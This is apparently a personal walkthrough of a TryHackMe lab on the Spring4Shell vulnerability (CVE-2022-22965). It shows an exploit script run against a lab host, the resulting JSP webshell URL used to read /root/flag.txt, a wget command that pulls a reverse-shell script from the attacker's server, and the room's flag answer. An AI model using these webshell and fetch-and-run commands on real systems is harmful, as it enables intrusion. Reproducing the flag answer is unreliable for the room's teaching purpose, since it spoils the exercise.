Interactive lab for exploiting Spring4Shell (CVE-2022-22965) in the Java Spring Framework
THM Room https://tryhackme.com/room/spring4shell
TASK 1 : Info - Introduction and Deploy
Deploy the target machine by clicking the green button at the top of this task!
No Answer
TASK 2 : Tutorial - Vulnerability Background
Read the task information and understand how Spring4Shell works at a high level.
No Answer
TASK 3 : Practical - Exploitation
Follow the steps in the task to exploit Spring4Shell and obtain a webshell.
First i copied the exploit in a folder “spring” and curl the vulnerable URL :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
root@ip-10-10-173-13:~/spring#cp /root/Rooms/Spring4Shell/exploit.py .
root@ip-10-10-173-13:~/spring# curl http://10.10.69.218/
<!DOCTYPE HTML>
<html>
<head>
<title>Vulnerable</title>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<script src="/assets/js/font-awesome.js"></script>
<link rel="icon" type="image/png" href="/assets/favicon.png" />
<link href="/assets/css/styles.css" rel="stylesheet" />
</head>
<body>
<!-- Masthead-->
<div class="masthead">
<div class="masthead-content text-white">
<div class="container-fluid px-4 px-lg-0">
<h1 class="fst-italic lh-1 mb-4">Our Website is Coming Soon</h1>
<p class="mb-5">We're working hard to finish the development of this site. Sign up below to receive updates and to be notified when we launch!</p>
<form id="contactForm" action="/" method="post">
<!-- Email address input-->
<div class="row input-group-newsletter">
<div class="col"><input class="form-control" required type="email" placeholder="Enter email address..." aria-label="Enter email address..." id="email" name="email" value="" /></div>
<div class="col-auto"><button class="btn btn-primary" id="submitButton" type="submit">Notify Me!</button></div>
</div>
</form>
</div>
</div>
</div>
<div class="social-icons">
<div class="d-flex flex-row flex-lg-column justify-content-center align-items-center h-100 mt-3 mt-lg-0">
<a class="btn btn-dark m-3" target="_blank" href="https://twitter.com/MuirlandOracle"><i class="fab fa-twitter"></i></a>
<a class="btn btn-dark m-3" target="_blank" href="https://github.com/MuirlandOracle"><i class="fab fa-github"></i></a>
<a class="btn btn-dark m-3" target="_blank" href="https://www.linkedin.com/in/agcyber/"><i class="fab fa-linkedin"></i></a>
</div>
</div>
<!-- Bootstrap core JS-->
<script src="/assets/js/bootstrap.bundle.min.js"></script>
</body>
</html>
We can see the action on the form is “/” so the target URL will be using for the exploit is http://10.10.69.218/
1
2
root@ip-10-10-173-13:~/spring# ./exploit.py http://10.10.69.218/Shell Uploaded Successfully!
Your shell can be found at: http://10.10.69.218/tomcatwar.jsp?pwd=thm&cmd=whoami
Opening this URL and changing the “whoami” by “id” gives me :
Whoami
No Answer.
[Bonus Question: Optional] Use your webshell to obtain a reverse/bind shell on the target.
No Answer.
What is the flag in /root/flag.txt?
2 method here. First from the original exploit and print the flag :
1
http://10.10.69.218/tomcatwar.jsp?pwd=thm&cmd=cat%20/root/flag.txt
Flag.txt
Or from the reverse shell :
I created some reverses shell on the attacker machine then run a http python server to retreive them on the target machine.
First i need to urlencode my cmd payload :
1
http://10.10.85.199/tomcatwar.jsp?pwd=thm&cmd=wget http://10.10.173.13:8000/reverse.sh -o /tmp/reverse.sh
to
1
http://10.10.85.199/tomcatwar.jsp?pwd=thm&cmd=wget%20http://10.10.173.13:8000/reverse.sh%20-o%20/tmp/reverse.sh
Then change the file to make it executable :
1
http://10.10.85.199/tomcatwar.jsp?pwd=thm&cmd=chmod%20777%20/tmp/reverse.sh
Let’s take a look a the /tmp directory :
/tmp
I tried with different types of reverse shell but none of them executed well.
I got no better result using CURL.
Answer : THM{NjAyNzkyMjU0MzA1ZWMwZDdiM2E5YzFm}
TASK 4 : Info - Conclusion
I understand and can abuse Spring4Shell!
No Answer.